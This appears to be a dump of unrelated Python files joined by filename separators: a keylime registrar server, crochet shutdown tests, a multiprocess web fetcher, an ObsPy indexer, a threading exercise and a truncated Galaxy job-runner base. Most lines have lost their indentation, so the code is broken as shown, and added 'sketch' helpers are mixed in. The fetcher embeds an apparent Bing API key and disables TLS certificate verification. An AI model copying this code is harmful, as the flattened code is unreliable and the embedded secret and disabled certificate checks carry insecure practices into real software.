config.echo_json_response(self, 400, "Error: %s" % e)
logger.warning("PUT for %s returning 400 response. Error: %s", agent_id, e)
logger.exception(e)
return
def do_DELETE(self):
"""DELETE not supported"""
config.echo_json_response(self, 405, "DELETE not supported")
# pylint: disable=W0622
def log_message(self, format, *args):
return
# consider using PooledProcessMixIn
# https://github.com/muayyad-alsadi/python-PooledProcessMixIn
class RegistrarServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
def __init__(self, server_address, RequestHandlerClass):
"""Constructor overridden to provide ability to read file"""
http.server.HTTPServer.__init__(
self, server_address, RequestHandlerClass)
def shutdown(self):
http.server.HTTPServer.shutdown(self)
def do_shutdown(servers):
for server in servers:
server.shutdown()
def start(host, tlsport, port):
"""Main method of the Registrar Server. This method is encapsulated in a function for packaging to allow it to be
called as a function by an external program."""
threads = []
servers = []
serveraddr = (host, tlsport)
RegistrarMain.metadata.create_all(engine, checkfirst=True)
session = SessionManager().make_session(engine)
try:
count = session.query(RegistrarMain.agent_id).count()
except SQLAlchemyError as e:
logger.error('SQLAlchemy Error: %s', e)
if count > 0:
logger.info("Loaded %d public keys from database", count)
server = RegistrarServer(serveraddr, ProtectedHandler)
context = cloud_verifier_common.init_mtls(section='registrar',
generatedir='reg_ca')
if context is not None:
server.socket = context.wrap_socket(server.socket, server_side=True)
thread = threading.Thread(target=server.serve_forever)
threads.append(thread)
# start up the unprotected registrar server
serveraddr2 = (host, port)
server2 = RegistrarServer(serveraddr2, UnprotectedHandler)
thread2 = threading.Thread(target=server2.serve_forever)
threads.append(thread2)
servers.append(server)
servers.append(server2)
    logger.info('Starting Cloud Registrar Server on ports %s and %s (TLS); use <Ctrl-C> to stop', port, tlsport)
keylime_api_version.log_api_versions(logger)
for thread in threads:
thread.start()
def signal_handler(signum, frame):
del signum, frame
do_shutdown(servers)
sys.exit(0)
# Catch these signals. Note that a SIGKILL cannot be caught, so
# killing this process with "kill -9" may result in improper shutdown
signal.signal(signal.SIGTERM, signal_handler)
signal.signal(signal.SIGQUIT, signal_handler)
signal.signal(signal.SIGINT, signal_handler)
# keep the main thread active, so it can process the signals and gracefully shutdown
while True:
if not any([thread.is_alive() for thread in threads]):
# All threads have stopped
break
# Some threads are still going
time.sleep(1)
for thread in threads:
thread.join()
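# A client-side sketch (not part of keylime) of the registration handshake that
# the unprotected handlers above implement: POST the EK certificate and AIK to
# /agents/<id> and receive the encrypted challenge 'blob', then PUT the derived
# auth_tag to activate the agent. The '/v<version>/agents/<id>' path layout and
# the JSON reply envelope are assumptions; the real path parsing lives in
# config.get_restful_params() and the reply is built by config.echo_json_response.
def _example_register_agent(host, port, api_version, agent_id, ekcert_b64, aik_tpm_b64):
    import http.client
    conn = http.client.HTTPConnection(host, port)
    conn.request('POST', '/v%s/agents/%s' % (api_version, agent_id),
                 body=json.dumps({'ekcert': ekcert_b64, 'aik_tpm': aik_tpm_b64}))
    reply = json.loads(conn.getresponse().read())  # the encrypted 'blob' is carried in this reply
    conn.close()
    return reply
def _example_activate_agent(host, port, api_version, agent_id, auth_tag):
    # auth_tag is crypto.do_hmac(key, agent_id), where 'key' is recovered by the
    # agent's TPM from the 'blob' returned at registration (see do_PUT above).
    import http.client
    conn = http.client.HTTPConnection(host, port)
    conn.request('PUT', '/v%s/agents/%s' % (api_version, agent_id),
                 body=json.dumps({'auth_tag': auth_tag}))
    status = conn.getresponse().status
    conn.close()
    return status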
|
test_shutdown.py
|
"""
Tests for _shutdown.
"""
from __future__ import absolute_import
import sys
import subprocess
import time
from twisted.trial.unittest import TestCase
from crochet._shutdown import (
Watchdog, FunctionRegistry, _watchdog, register, _registry)
from ..tests import crochet_directory
class ShutdownTests(TestCase):
"""
Tests for shutdown registration.
"""
def test_shutdown(self):
"""
A function registered with _shutdown.register() is called when the
main thread exits.
"""
program = """\
import threading, sys
from crochet._shutdown import register, _watchdog
_watchdog.start()
end = False
def thread():
while not end:
pass
sys.stdout.write("byebye")
sys.stdout.flush()
def stop(x, y):
# Move this into separate test at some point.
assert x == 1
assert y == 2
global end
end = True
threading.Thread(target=thread).start()
register(stop, 1, y=2)
sys.exit()
"""
process = subprocess.Popen([sys.executable, "-c", program],
cwd=crochet_directory,
stdout=subprocess.PIPE)
result = process.stdout.read()
self.assertEqual(process.wait(), 0)
self.assertEqual(result, b"byebye")
def test_watchdog(self):
"""
The watchdog thread exits when the thread it is watching exits, and
calls its shutdown function.
"""
done = []
alive = True
class FakeThread:
def is_alive(self):
return alive
w = Watchdog(FakeThread(), lambda: done.append(True))
w.start()
time.sleep(0.2)
self.assertTrue(w.is_alive())
self.assertFalse(done)
alive = False
time.sleep(0.2)
self.assertTrue(done)
self.assertFalse(w.is_alive())
def test_api(self):
"""
The module exposes a shutdown thread that will call a global
registry's run(), and a register function tied to the global registry.
"""
self.assertIsInstance(_registry, FunctionRegistry)
self.assertEqual(register, _registry.register)
self.assertIsInstance(_watchdog, Watchdog)
self.assertEqual(_watchdog._shutdown_function, _registry.run)
class FunctionRegistryTests(TestCase):
"""
Tests for FunctionRegistry.
"""
def test_called(self):
"""
Functions registered with a FunctionRegistry are called in reverse
order by run().
"""
result = []
registry = FunctionRegistry()
registry.register(lambda: result.append(1))
registry.register(lambda x: result.append(x), 2)
registry.register(lambda y: result.append(y), y=3)
registry.run()
self.assertEqual(result, [3, 2, 1])
def test_log_errors(self):
"""
Registered functions that raise an error have the error logged, and
run() continues processing.
"""
result = []
registry = FunctionRegistry()
registry.register(lambda: result.append(2))
registry.register(lambda: 1 / 0)
registry.register(lambda: result.append(1))
registry.run()
self.assertEqual(result, [1, 2])
excs = self.flushLoggedErrors(ZeroDivisionError)
self.assertEqual(len(excs), 1)
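# A minimal usage sketch (not one of the tests above) of the API these tests
# exercise: start the watchdog, then register a cleanup callback that runs when
# the main thread exits. The file path argument is purely illustrative.
def _example_register_cleanup(path):
    from crochet._shutdown import register, _watchdog
    _watchdog.start()
    def cleanup(target_path, reason="main thread exited"):
        with open(target_path, "w") as f:
            f.write(reason)
    register(cleanup, path, reason="interpreter shutting down")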
|
multiproc_fetcher.py
|
import re
import os
import sys
import json
import time
import pickle
import random
import requests
import traceback
import url_normalize
from multiprocessing import Pool
from multiprocessing import Queue
from multiprocessing import Process
# Disable insecure warning
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
#from requests.adapters import TimeoutSauce
#class MyTimeout(TimeoutSauce):
# def __init__(self, *args, **kwargs):
# connect = kwargs.get('connect', 5)
# read = kwargs.get('read', connect)
# super(MyTimeout, self).__init__(connect=connect, read=read)
#
#requests.adapters.TimeoutSauce = MyTimeout
sys.path.append("utils")
sys.path.append("extraction")
sys.path.append("search_apis")
from page import Page
from cache import Cache
from website import Website
from urlutility import URLUtility
from bing_search import Bing_Search
from link_extractor import Link_Extractor
def init_cache(filename):
print "Loading ", filename
return Cache(filename)
class Fetcher:
def __init__(self, data_dir, data_file=None, caching=True):
"""
Args:
caching: if False, do not store the data.
            In this case, fetch() might be called more than once for the same urls,
            so url deduplication needs to be handled outside the class
"""
if caching:
print "caching is TRUE - Save the fetched pages"
else:
print "caching is False - Don't save the fetched pages"
self.link_extractor = Link_Extractor()
self.header = {'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36'}
if not os.path.exists(data_dir):
os.makedirs(data_dir)
self.max_html_size = 1000000 # discard exceptionally large files
self.proc_numb = 32 # number of processes
self.timeout = 5 # requests timeout
self.caching = caching
self.uniq_urls = set() # Avoid re-crawling the previous urls. This variable will keep track of failed urls, which are not stored in discovery class
"""
# Single process
self.caches = []
for i in xrange(self.proc_numb):
name = data_file if data_file else "fetch"
if i:
fetch_cache_file = data_dir + "/" + name + "." + str(i) + ".json"
else:
fetch_cache_file = data_dir + "/" + name + ".json" # make the file compatible with single process fetcher
print fetch_cache_file
self.caches.append(Cache(fetch_cache_file))
"""
cache_files = [] # File to store that data
for i in xrange(self.proc_numb):
name = data_file if data_file else "fetch"
if i:
fetch_cache_file = data_dir + "/" + name + "." + str(i) + ".json"
else:
fetch_cache_file = data_dir + "/" + name + ".json" # make the file compatible with single process fetcher
cache_files.append(fetch_cache_file)
pool = Pool(self.proc_numb)
self.caches = pool.map(init_cache, cache_files)
bing_api_key = '79be97cfb50b418caf9cd0bff0ece408' #[email protected]
self.bing_search = Bing_Search(bing_api_key, data_dir)
def _contains(self, url):
"""
Check the cache if it contains the url.
Returns:
return a dict object if url exists in the cache, else return None
"""
for cache in self.caches:
if cache.contains(url):
return cache.get(url)
return None
def fetch_sites(self, urls, max_pages=1, selection="random", online=True, allow_fetch_later=False):
"""
Fetch the sites.
Step 1: Fetch the home pages
Step 2: Select representative pages from the fetched sites
Step 3: Fetch the selected representative pages
Step 4: Merge the fetched results
Parameters:
-----------
urls: list of url. Each url represents a website
max_pages: maximum number of pages to be selected in each website
selection: method to select pages in a website
online (boolean): online or offline mode. In offline mode, read data from the cache.
Returns:
--------
list<website>: list of fetched websites
"""
"""
# Hack: used pre-fetched data
if online==False and selection=="search":
# Read from the cache and return results
print "hacking ..."
print max_pages
websites = {}
for url in urls:
tld = URLUtility.get_tld(url)
websites[tld] = Website(url)
for url in self.cache.keys():
tld = URLUtility.get_tld(url)
if tld in websites:
#if len(websites[tld].pages)<max_pages:
page = Page(url)
page.load_from_json(self.cache.get(url))
websites[tld].add_page(page)
websites = [w for w in websites.values() if not w.is_empty()]
print "Number of websites that found in cache: ", len(websites)
for w in websites:
print w.get_host(), len(w.pages)
return websites
"""
#THE BELOW CODE WORKS FOR MULTIPLE-PAGES CASE BUT NOT OPTIMIZED FOR ONE-PAGE CASE
# Step 1: Fetch the home pages
pages = self.fetch_pages(urls, online, allow_fetch_later)
max_pages -= 1 # exclude the home page
websites = {}
for p in pages:
tld = p.get_tld()
w = Website(p.get_url())
w.add_page(p)
websites[tld] = w
# Step 2: Select representative pages from the fetched sites
if max_pages:
print " Selecting insite pages for representation. Selection method: ", selection
insite_urls = []
if selection==None:
# Only fetch the homepage
return websites.values()
if selection=="random":
for page in pages:
insite_urls.extend(self._select_random(page, max_pages))
elif selection=="search":
for page in pages:
insite_urls.extend(self._select_by_search(page, max_pages))
else:
print "Wrong selection method"
print " Selected ", len(insite_urls), " urls from ", len(pages), " sites"
# Step 3: Fetch the selected representative pages
pages = self.fetch_pages(insite_urls, online, allow_fetch_later)
# Step 4: Merge the fetched results
for p in pages:
tld = p.get_tld()
if tld not in websites:
print " Error: host does not exist", tld, p.get_url()
else:
websites[tld].add_page(p)
total_pages = sum([len(websites[tld].pages) for tld in websites])
print total_pages, len(websites)
if websites:
print " Average number of pages per site: ", total_pages/float(len(websites))
return websites.values()
"""
# Keep one url for each website
uniq_hosts = set()
temp_urls = []
for url in urls:
host = URLUtility.get_host(url)
if host not in uniq_hosts:
uniq_hosts.add(host)
temp_urls.append(url)
print "Fetching ", url
urls = temp_urls
# Fetch
pages = self.fetch_pages(urls, online, allow_fetch_later)
# Construct website list from page list (one page per site)
websites = []
for p in pages:
w = Website(p.get_url())
w.add_page(p)
websites.append(w)
return websites
"""
def _select_random(self, page, max_pages):
"""
Select random insite outlinks
"""
insite_urls = list(set(self.link_extractor.extract_insite_links(page.get_url(), page.get_html())))
return insite_urls[:max_pages]
"""
random.seed(len(insite_urls)) # make the randomness reproducible
#if not insite_urls:
# print page.get_url(), len(page.get_html())
if len(insite_urls)<max_pages:
return insite_urls
selected_urls = set()
while len(selected_urls)<max_pages:
i = random.randint(0, len(insite_urls)-1)
selected_urls.add(insite_urls[i])
return list(selected_urls)
"""
random.seed(len(insite_urls)) # make the randomness reproducible
def _select_by_search(self, page, max_pages):
"""
Select pages inside a given website using site search
Args:
max_pages: maximum number of pages selected in the site
"""
"Selecing pages using bing search"
host = page.get_host()
keyword = "gun"
urls = self.bing_search.search_site(keyword, host)
ret = []
for url in urls:
if len(ret)<max_pages:
if url!=page.get_url():
ret.append(url)
"""
if host=="http://www.armslist.com/":
print urls
print ret
print max_pages
"""
return ret
def _load_from_cache(self, urls):
"""
left_urls = []
pages = []
for url in urls:
obj = self._contains(url)
if obj:
page = Page(url)
page.load_from_json(obj)
pages.append(page)
else:
left_urls.append(url)
return pages, left_urls
"""
urls = set(urls)
loaded_urls = set()
pages = []
for cache in self.caches:
for url in cache.keys():
if (url in urls) and (url not in loaded_urls):
page = Page(url)
loaded_urls.add(url)
page.load_from_json(cache.get(url))
if page.body: # skip the page whose text extraction was failed
pages.append(page)
left_urls = [url for url in urls if url not in loaded_urls]
return pages, left_urls
def fetch_pages(self, urls, online=True, allow_fetch_later=False):
"""
Fetch the urls that are not in cache
Parameters:
-----------
urls: list of url. Each url represents a website
Returns:
--------
list<website>: list of fetched websites
"""
# Remove urls that were crawled previously
print "Number of urls considering to fetch: ", len(urls)
if allow_fetch_later==False:
temp_urls = []
for url in urls:
if url not in self.uniq_urls:
self.uniq_urls.add(url)
temp_urls.append(url)
urls = temp_urls
print "Number of urls will be fetched: ", len(urls)
pages, urls = self._load_from_cache(urls)
print " ", len(pages), " urls loaded from the cache, ", len(urls), " urls left"
if online:
jobs = []
results = Queue()
for i in range(self.proc_numb):
p = Process(target = self.fetch_pages_helper, args = (urls, i, self.proc_numb, self.caches[i], results))
jobs.append(p)
for p in jobs:
p.start()
fetched_pages = [p for _ in jobs for p in results.get()] # Result must be collected before join()
for p in jobs:
p.join()
if urls:
print " Fetched ", len(fetched_pages), " urls"
pages.extend(fetched_pages)
return pages
def fetch_pages_helper(self, urls, start, step, cache, results):
"""
Helper function for parallel fetching
"""
max_size = 5000000
pages = []
for i in range(start, len(urls), step):
url = urls[i]
if (i+1)%500==0:
print "Fetched ", i, " urls"
page = Page(url)
try:
text = ''
size = 0
res = requests.get(url, headers=self.header, verify=False, timeout=5, stream=True)
#t = time.time()
for chunk in res.iter_content(10000):
#if (time.time() - t) > 5:
# break
# raise ValueError('timeout reached')
text += chunk
size += len(chunk)
if size > max_size:
print "Size exceeds ", size
raise ValueError('response too large')
if res.status_code == 200:
#page = Page(url)
if len(text)<self.max_html_size:
page.add_html(text)
else:
print "Failed to fetch ", url, res.status_code, start
except:
print "Failed to fetch ", url
continue
            # Save to cache. Note that we always save the fetched pages even if the request failed,
            # since we want to avoid re-fetching these pages in the future
if self.caching:
cache.add(url, page.get_json_obj())
else:
page.get_json_obj() # hack
if page.body and (len(page.get_text('body'))>100):
#if not page.is_empty():
pages.append(page)
results.put(pages)
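# A standalone sketch (not used by the Fetcher class) of the fan-out pattern
# fetch_pages() relies on above: each worker handles every worker_count-th item,
# puts its list of results on a shared Queue, and the parent drains the Queue
# once per worker *before* join() so the queue feeder threads can exit. Like the
# code above, this assumes fork-based multiprocessing (Unix), since the worker
# closure and handle_item must be inherited by the child processes.
def _example_fan_out(items, worker_count, handle_item):
    results = Queue()
    def work(start):
        out = [handle_item(items[i]) for i in range(start, len(items), worker_count)]
        results.put(out)
    jobs = [Process(target=work, args=(i,)) for i in range(worker_count)]
    for p in jobs:
        p.start()
    collected = [x for _ in jobs for x in results.get()]  # collect before join(), as in fetch_pages()
    for p in jobs:
        p.join()
    return collected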
def test():
fetcher = Fetcher("test/fetcher_test_data")
urls = URLUtility.load_urls("test/data/urls.txt")
    sites = fetcher.fetch_sites(urls)
for site in sites:
        for page in site.pages:
print page.get_text('body')[:100].replace("\n", "")
def _read_urls_from_json(url_file):
urls = set()
with open(url_file) as lines:
for line in lines:
try:
jsonobj = json.loads(line)
for url in jsonobj[1:]:
url = URLUtility.normalize(url)
urls.add(url)
except:
traceback.print_exc()
print "Number of urls read from json file: ", len(urls)
return list(urls)
def fetch():
url_file = sys.argv[1]
urls = _read_urls_from_json(url_file)
data_dir = sys.argv[2]
fetcher = Fetcher(data_dir)
fetcher.fetch_sites(urls, 3, selection=None, online=True)
if __name__=="__main__":
#test()
fetch()
|
indexer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
A command-line program that indexes seismogram files into a database.
:copyright:
The ObsPy Development Team ([email protected])
:license:
GNU Lesser General Public License, Version 3
(https://www.gnu.org/copyleft/lesser.html)
.. rubric:: Usage Examples
(1) Run indexer as daemon continuously crawling the given paths but index only
the last 24 hours (-r24) of a waveform archive::
#!/bin/bash
DB=postgresql://username:password@localhost:5432/database
DATA=/path/to/archive/2010,/path/to/archive/2011,/path/to/arclink
LOG=/path/to/indexer.log
./obspy-indexer -v -i0.0 -n1 -u$DB -d$DATA -r24 -l$LOG &
(2) Run only once and remove duplicates::
./obspy-indexer -v -i0.0 --run-once --check-duplicates -n1 -u$DB -d$DATA
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from future.builtins import * # NOQA @UnusedWildImport
from future.utils import native_str
import logging
import multiprocessing
import select
import sys
from argparse import ArgumentParser
if sys.version_info.major == 2:
import BaseHTTPServer as http_server
else:
import http.server as http_server
from sqlalchemy import create_engine
from sqlalchemy.orm.session import sessionmaker
from obspy import __version__
from obspy.db.db import Base
from obspy.db.indexer import WaveformFileCrawler, worker
from obspy.db.util import parse_mapping_data
class MyHandler(http_server.BaseHTTPRequestHandler):
def do_GET(self): # noqa
"""
Respond to a GET request.
"""
out = """<html>
<head>
<title>obspy-indexer status</title>
<meta http-equiv="refresh" content="10" />
<style type="text/css">
th { text-align: left; font-family:monospace; width: 150px;
vertical-align: top; padding: 3px; }
td { font-family:monospace; padding: 3px;}
pre { margin: 0; }
</style>
</head>
<body>
<h1>obspy-indexer</h1>
<h2>Options</h2>
"""
out += '<table>'
for key, value in sorted(self.server.options.__dict__.items()):
out += "<tr><th>%s</th><td>%s</td></tr>" % (key, value)
if self.server.mappings:
out += "<tr><th>mapping rules</th><td>%s</td></tr>" % \
(self.server.mappings)
out += '</table>'
out += '<h2>Status</h2>'
out += '<table>'
out += "<tr><th>current path</th><td>%s</td></tr>" % \
(self.server._current_path)
out += "<tr><th>patterns</th><td><pre>%s</pre></td></tr>" % \
('\n'.join(self.server.patterns))
out += "<tr><th>features</th><td><pre>%s</pre></td></tr>" % \
('\n'.join(self.server.features))
out += "<tr><th>file queue</th><td><pre>%s</pre></td></tr>" % \
('\n'.join(self.server._current_files))
out += '</table>'
out += "</body></html>"
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
        self.wfile.write(out.encode('utf-8'))
class WaveformIndexer(http_server.HTTPServer, WaveformFileCrawler):
"""
A waveform indexer server.
"""
def serve_forever(self, poll_interval=0.5):
self.running = True
while self.running:
r, _w, _e = select.select([self], [], [], poll_interval)
if r:
self._handle_request_noblock()
self.iterate()
def _run_indexer(options):
logging.info("Starting indexer %s:%s ..." % (options.host, options.port))
# initialize crawler
service = WaveformIndexer((options.host, options.port), MyHandler)
service.log = logging
try:
# prepare paths
if ',' in options.data:
paths = options.data.split(',')
else:
paths = [options.data]
paths = service._prepare_paths(paths)
if not paths:
return
# prepare map file
if options.mapping_file:
with open(options.mapping_file, 'r') as f:
data = f.readlines()
mappings = parse_mapping_data(data)
logging.info("Parsed %d lines from mapping file %s" %
(len(data), options.mapping_file))
else:
mappings = {}
# create file queue and worker processes
manager = multiprocessing.Manager()
in_queue = manager.dict()
work_queue = manager.list()
out_queue = manager.list()
log_queue = manager.list()
# spawn processes
for i in range(options.number_of_cpus):
args = (i, in_queue, work_queue, out_queue, log_queue, mappings)
p = multiprocessing.Process(target=worker, args=args)
p.daemon = True
p.start()
# connect to database
engine = create_engine(options.db_uri, encoding=native_str('utf-8'),
convert_unicode=True)
metadata = Base.metadata
# recreate database
if options.drop_database:
metadata.drop_all(engine, checkfirst=True)
metadata.create_all(engine, checkfirst=True)
# initialize database + options
_session = sessionmaker(bind=engine)
service.session = _session
service.options = options
service.mappings = mappings
# set queues
service.input_queue = in_queue
service.work_queue = work_queue
service.output_queue = out_queue
service.log_queue = log_queue
service.paths = paths
service._reset_walker()
service._step_walker()
service.serve_forever(options.poll_interval)
except KeyboardInterrupt:
quit()
logging.info("Indexer stopped.")
def main(argv=None):
parser = ArgumentParser(prog='obspy-indexer',
description='\n'.join(__doc__.split('\n')[:3]))
parser.add_argument('-V', '--version', action='version',
version="%(prog)s " + __version__)
parser.add_argument(
'-v', '--verbose', action='store_true',
help='Verbose output.')
parser.add_argument(
'-d', '--data', default='data=*.*',
help="""Path, search patterns and feature plug-ins of waveform files.
The indexer will crawl recursively through all sub-directories within each
given path. Multiple paths have to be separated with a comma, e.g.
'/first/path=*.*,/second/path,/third/path=*.gse'.
File patterns are given as space-separated list of wildcards after a equal
sign, e.g.
'/path=*.gse2 *.mseed,/second/path=*.*'.
Feature plug-ins may be added using the hash (#) character, e.g.
'/path=*.mseed#feature1#feature2,/second/path#feature2'.
Be aware that features must be provided behind file patterns (if any)! There is
no default feature enabled.
Default path option is 'data=*.*'.""")
parser.add_argument(
'-u', '--db-uri', default='sqlite:///indexer.sqlite',
help="Database connection URI, such as "
"postgresql://scott:tiger@localhost/mydatabase. "
"Default is a SQLite database './indexer.sqlite'.")
parser.add_argument(
'-n', type=int, dest='number_of_cpus',
help="Number of CPUs used for the indexer.",
default=multiprocessing.cpu_count())
parser.add_argument(
'-i', '--poll-interval', type=float, default=0.1,
help="Poll interval for file crawler in seconds (default is 0.1).")
parser.add_argument(
'-r', '--recent', type=int, default=0,
help="Index only recent files modified within the given "
"number of hours. This option is deactivated by default.")
parser.add_argument(
'-l', '--log', default='',
help="Log file name. If no log file is given, stdout will be used.")
parser.add_argument(
'-m', '--mapping-file', default=None,
help="Correct network, station, location and channel codes using a" +
" custom mapping file.")
parser.add_argument(
'-a', '--all-files', action='store_false', dest='skip_dots',
help="The indexer will automatically skip paths or "
"files starting with a dot. This option forces "
"parsing of all paths and files.")
parser.add_argument(
'-1', '--run-once', action='store_true',
help="The indexer will parse through all given directories only "
"once and quit afterwards.")
parser.add_argument(
'--check-duplicates', action='store_true',
help="Checks for duplicate entries within database. "
"This feature will slow down the indexer progress.")
parser.add_argument(
'--cleanup', action='store_true',
help="Clean database from non-existing files or paths " +
"if activated, but will skip all paths marked as " +
"archived in the database.")
parser.add_argument(
'-f', '--force-reindex', action='store_true',
help="Reindex existing index entry for every crawled file.")
parser.add_argument(
'--drop-database', action='store_true',
help="Deletes and recreates the complete database at start up.")
parser.add_argument(
'-H', '--host', default='localhost',
help="Server host name. Default is 'localhost'.")
parser.add_argument(
'-p', '--port', type=int, default=0,
help="Port number. If not given a free port will be picked.")
args = parser.parse_args(argv)
# set level of verbosity
if args.verbose:
level = logging.DEBUG
else:
level = logging.INFO
if args.log == "":
logging.basicConfig(stream=sys.stdout, level=level,
format="%(asctime)s [%(levelname)s] %(message)s")
else:
logging.basicConfig(filename=args.log, level=level,
format="%(asctime)s [%(levelname)s] %(message)s")
_run_indexer(args)
if __name__ == "__main__":
main()
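# An illustrative helper (deliberately kept out of the __main__ guard so it never
# runs on import) showing how main() above can be driven programmatically with
# the same flags the ArgumentParser defines; the path and database URI below are
# placeholders, not recommendations.
def _example_run_once():
    main(['-v',
          '-u', 'sqlite:///indexer.sqlite',
          '-d', '/path/to/archive=*.mseed',
          '-n', '1',
          '--run-once'])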
|
thread6.py
|
# Python Program To Create A Thread That Acts On The Objects Of A Class
# That Is Not Derived From The Thread Class
'''
Function Name : Creating Thread Without Sub Class To Thread Class
Function Date : 3 Oct 2020
Function Author : Prasad Dangare
Input : Integer
Output : Integer
'''
from threading import *
class MyThread:
# A Constructor
def __init__(self, str):
self.str = str
# A Method
def display(self, x, y):
print(self.str)
print('The args Are : ', x, y)
# Create An Instance To Our Class And Store 'Hello' String
obj = MyThread('Hello')
# Create A Thread To Run Display Method Of obj
t1 = Thread(target=obj.display, args=(1, 2))
# Run The Thread
t1.start()
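# A small follow-up sketch in the same spirit as the example above: pass the
# bound method both positional and keyword arguments, and join() the thread so
# the main program waits for it to finish. (Illustrative addition, not part of
# the original exercise.)
obj2 = MyThread('World')
t2 = Thread(target=obj2.display, args=(3,), kwargs={'y': 4})
t2.start()
t2.join()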
|
__init__.py
|
"""
Base classes for job runner plugins.
"""
import os
import time
import string
import logging
import datetime
import threading
import subprocess
from Queue import Queue, Empty
import galaxy.jobs
from galaxy.jobs.command_factory import build_command
from galaxy import model
from galaxy.util import DATABASE_MAX_STRING_SIZE, shrink_stream_by_size
from galaxy.util import in_directory
from galaxy.util import ParamsWithSpecs
from galaxy.util import ExecutionTimer
from galaxy.util.bunch import Bunch
from galaxy.jobs.runners.util.job_script import write_script
from galaxy.jobs.runners.util.job_script import job_script
from galaxy.jobs.runners.util.env import env_to_statement
from .state_handler_factory import build_state_handlers
log = logging.getLogger( __name__ )
STOP_SIGNAL = object()
JOB_RUNNER_PARAMETER_UNKNOWN_MESSAGE = "Invalid job runner parameter for this plugin: %s"
JOB_RUNNER_PARAMETER_MAP_PROBLEM_MESSAGE = "Job runner parameter '%s' value '%s' could not be converted to the correct type"
JOB_RUNNER_PARAMETER_VALIDATION_FAILED_MESSAGE = "Job runner parameter %s failed validation"
GALAXY_LIB_ADJUST_TEMPLATE = """GALAXY_LIB="%s"; if [ "$GALAXY_LIB" != "None" ]; then if [ -n "$PYTHONPATH" ]; then PYTHONPATH="$GALAXY_LIB:$PYTHONPATH"; else PYTHONPATH="$GALAXY_LIB"; fi; export PYTHONPATH; fi;"""
GALAXY_VENV_TEMPLATE = """GALAXY_VIRTUAL_ENV="%s"; if [ "$GALAXY_VIRTUAL_ENV" != "None" -a -z "$VIRTUAL_ENV" -a -f "$GALAXY_VIRTUAL_ENV/bin/activate" ]; then . "$GALAXY_VIRTUAL_ENV/bin/activate"; fi;"""
class RunnerParams( ParamsWithSpecs ):
def _param_unknown_error( self, name ):
raise Exception( JOB_RUNNER_PARAMETER_UNKNOWN_MESSAGE % name )
def _param_map_error( self, name, value ):
raise Exception( JOB_RUNNER_PARAMETER_MAP_PROBLEM_MESSAGE % ( name, value ) )
def _param_vaildation_error( self, name, value ):
raise Exception( JOB_RUNNER_PARAMETER_VALIDATION_FAILED_MESSAGE % name )
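# A minimal sketch (not part of Galaxy) of how the runner parameter specs used
# below are meant to behave: each spec entry supplies a ``map`` callable to
# coerce the raw value, a ``valid`` predicate, and a ``default``. The exact
# coercion semantics live in ParamsWithSpecs and are assumed here from the way
# BaseJobRunner.__init__ constructs RunnerParams( specs=..., params=... ).
def _example_runner_params():
    specs = dict( recheck_missing_job_retries=dict( map=int, valid=lambda x: x >= 0, default=0 ) )
    return RunnerParams( specs=specs, params=dict( recheck_missing_job_retries='2' ) )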
class BaseJobRunner( object ):
DEFAULT_SPECS = dict( recheck_missing_job_retries=dict( map=int, valid=lambda x: x >= 0, default=0 ) )
def __init__( self, app, nworkers, **kwargs ):
"""Start the job runner
"""
self.app = app
self.sa_session = app.model.context
self.nworkers = nworkers
runner_param_specs = self.DEFAULT_SPECS.copy()
if 'runner_param_specs' in kwargs:
runner_param_specs.update( kwargs.pop( 'runner_param_specs' ) )
if kwargs:
log.debug( 'Loading %s with params: %s', self.runner_name, kwargs )
self.runner_params = RunnerParams( specs=runner_param_specs, params=kwargs )
self.runner_state_handlers = build_state_handlers()
def _init_worker_threads(self):
"""Start ``nworkers`` worker threads.
"""
self.work_queue = Queue()
self.work_threads = []
log.debug('Starting %s %s workers' % (self.nworkers, self.runner_name))
for i in range(self.nworkers):
worker = threading.Thread( name="%s.work_thread-%d" % (self.runner_name, i), target=self.run_next )
worker.setDaemon( True )
worker.start()
self.work_threads.append( worker )
def run_next(self):
"""Run the next item in the work queue (a job waiting to run)
"""
while True:
( method, arg ) = self.work_queue.get()
if method is STOP_SIGNAL:
return
# id and name are collected first so that the call of method() is the last exception.
try:
if isinstance(arg, AsynchronousJobState):
job_id = arg.job_wrapper.get_id_tag()
else:
# arg should be a JobWrapper/TaskWrapper
job_id = arg.get_id_tag()
except:
job_id = 'unknown'
try:
name = method.__name__
except:
name = 'unknown'
try:
method(arg)
except:
log.exception( "(%s) Unhandled exception calling %s" % ( job_id, name ) )
# Causes a runner's `queue_job` method to be called from a worker thread
def put(self, job_wrapper):
"""Add a job to the queue (by job identifier), indicate that the job is ready to run.
"""
put_timer = ExecutionTimer()
job = job_wrapper.get_job()
# Change to queued state before handing to worker thread so the runner won't pick it up again
job_wrapper.change_state( model.Job.states.QUEUED, flush=False, job=job )
# Persist the destination so that the job will be included in counts if using concurrency limits
job_wrapper.set_job_destination( job_wrapper.job_destination, None, flush=False, job=job )
self.sa_session.flush()
self.mark_as_queued(job_wrapper)
log.debug("Job [%s] queued %s" % (job_wrapper.job_id, put_timer))
def mark_as_queued(self, job_wrapper):
self.work_queue.put( ( self.queue_job, job_wrapper ) )
def shutdown( self ):
"""Attempts to gracefully shut down the worker threads
"""
log.info( "%s: Sending stop signal to %s worker threads" % ( self.runner_name, len( self.work_threads ) ) )
for i in range( len( self.work_threads ) ):
self.work_queue.put( ( STOP_SIGNAL, None ) )
# Most runners should override the legacy URL handler methods and destination param method
def url_to_destination(self, url):
"""
Convert a legacy URL to a JobDestination.
Job runner URLs are deprecated, JobDestinations should be used instead.
This base class method converts from a URL to a very basic
JobDestination without destination params.
"""
return galaxy.jobs.JobDestination(runner=url.split(':')[0])
def parse_destination_params(self, params):
"""Parse the JobDestination ``params`` dict and return the runner's native representation of those params.
"""
raise NotImplementedError()
def prepare_job(self, job_wrapper, include_metadata=False, include_work_dir_outputs=True,
modify_command_for_container=True):
"""Some sanity checks that all runners' queue_job() methods are likely to want to do
"""
job_id = job_wrapper.get_id_tag()
job_state = job_wrapper.get_state()
job_wrapper.is_ready = False
job_wrapper.runner_command_line = None
# Make sure the job hasn't been deleted
if job_state == model.Job.states.DELETED:
